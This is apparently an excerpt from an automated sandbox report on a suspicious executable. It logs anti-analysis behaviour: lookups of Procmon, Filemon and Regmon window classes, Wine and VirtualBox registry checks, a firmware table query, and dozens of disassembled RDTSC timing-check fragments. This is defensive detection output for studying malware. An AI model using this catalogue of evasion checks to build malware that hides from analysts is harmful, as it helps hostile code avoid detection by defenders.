        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B8FE second address: D4B903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B903 second address: D4B917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5908B64E66h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B917 second address: D4B91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C350 second address: D3C372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5908B64E78h 0x00000009 jc 00007F5908B64E66h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A975 second address: D4A985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F590909A3E6h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4A985 second address: D4A990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AE0B second address: D4AE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F590909A3F2h 0x0000000c jmp 00007F590909A3F5h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4AE39 second address: D4AE3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4B0CF second address: D4B0D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DDA1 second address: D4DDC4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F5908B64E6Ch 0x00000010 mov eax, dword ptr [eax] 0x00000012 jnl 00007F5908B64E74h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DDC4 second address: D4DDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DDC8 second address: D4DDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5908B64E71h 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DF24 second address: D4DF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DF29 second address: D4DF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jng 00007F5908B64E66h 0x00000013 jmp 00007F5908B64E6Ah 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DF4B second address: D4DF63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jns 00007F590909A3EEh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4DFCD second address: D4DFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5908B64E72h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F5908B64E66h 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E09C second address: D4E0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E0A0 second address: D4E0F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F5908B64E6Eh 0x00000010 push edi 0x00000011 jnc 00007F5908B64E66h 0x00000017 pop edi 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F5908B64E73h 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 push edx 0x00000025 jnp 00007F5908B64E66h 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F5908B64E6Fh 0x00000033 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E2CF second address: D4E2D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E2D3 second address: D4E2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F5908B64E66h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E2E7 second address: D4E2EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6CF12 second address: D6CF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 je 00007F5908B64E66h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D051 second address: D6D071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F590909A3F7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D071 second address: D6D08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5908B64E71h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D08F second address: D6D099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F590909A3E6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D099 second address: D6D0B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D0B9 second address: D6D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D0C1 second address: D6D0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D0C6 second address: D6D0D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F590909A3F2h 0x00000008 jnp 00007F590909A3E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D259 second address: D6D25F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D25F second address: D6D269 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F590909A3E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D269 second address: D6D272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D272 second address: D6D280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F590909A3E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D280 second address: D6D297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5908B64E6Eh 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D297 second address: D6D2A4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F590909A3E8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DB36 second address: D6DB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61B84 second address: D61B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F590909A3E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E126 second address: D6E14E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5908B64E74h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5908B64E6Ch 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E14E second address: D6E181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F5h 0x00000007 jmp 00007F590909A3EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F590909A3EDh 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EAF5 second address: D6EAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EAFB second address: D6EAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC3E second address: D6EC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F5908B64E66h 0x0000000d jnc 00007F5908B64E66h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EC51 second address: D6EC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73BB2 second address: D73BF1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5908B64E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5908B64E74h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5908B64E79h 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73CD6 second address: D73D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F590909A3E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jno 00007F590909A3EEh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnl 00007F590909A3E6h 0x00000022 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73D00 second address: D73D42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F5908B64E68h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F5908B64E73h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push ebx 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7255D second address: D72564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72564 second address: D7256E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5908B64E66h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E25 second address: D73E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E29 second address: D73E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E2F second address: D73E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E34 second address: D73E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E3A second address: D73E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jp 00007F590909A3E6h 0x00000014 pop edi 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E4F second address: D73E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E55 second address: D73E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E59 second address: D73E80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75F35 second address: D75F62 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F590909A3ECh 0x00000008 jng 00007F590909A3E6h 0x0000000e jmp 00007F590909A3F8h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75F62 second address: D75F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75F66 second address: D75F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F590909A405h 0x0000000c je 00007F590909A3E6h 0x00000012 jmp 00007F590909A3F9h 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F590909A3E6h 0x0000001f jl 00007F590909A3E6h 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4673C second address: D46759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E72h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A377 second address: D7A393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F590909A3E6h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F590909A3EDh 0x00000013 pop eax 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A393 second address: D7A39D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5908B64E72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A39D second address: D7A3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F590909A3E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38C33 second address: D38C3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5908B64E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38C3D second address: D38C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F590909A3E6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38C4E second address: D38C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5908B64E74h 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79AC9 second address: D79ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79ACF second address: D79AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C795 second address: D7C7DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F590909A3F5h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c jmp 00007F590909A3ECh 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 jl 00007F590909A3ECh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C7DA second address: D7C7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7C7DE second address: D7C80C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F590909A3F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop esi 0x00000013 pop eax 0x00000014 push 2294BE11h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7CAB4 second address: D7CAB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7CE22 second address: D7CE28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7CE28 second address: D7CE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D2FF second address: D7D336 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F590909A3E8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 sbb esi, 572B5420h 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e push edi 0x0000002f pushad 0x00000030 popad 0x00000031 pop edi 0x00000032 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D336 second address: D7D340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5908B64E66h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D401 second address: D7D40F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D40F second address: D7D414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D414 second address: D7D42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F590909A3F4h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D752 second address: D7D757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D8F5 second address: D7D903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D903 second address: D7D908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
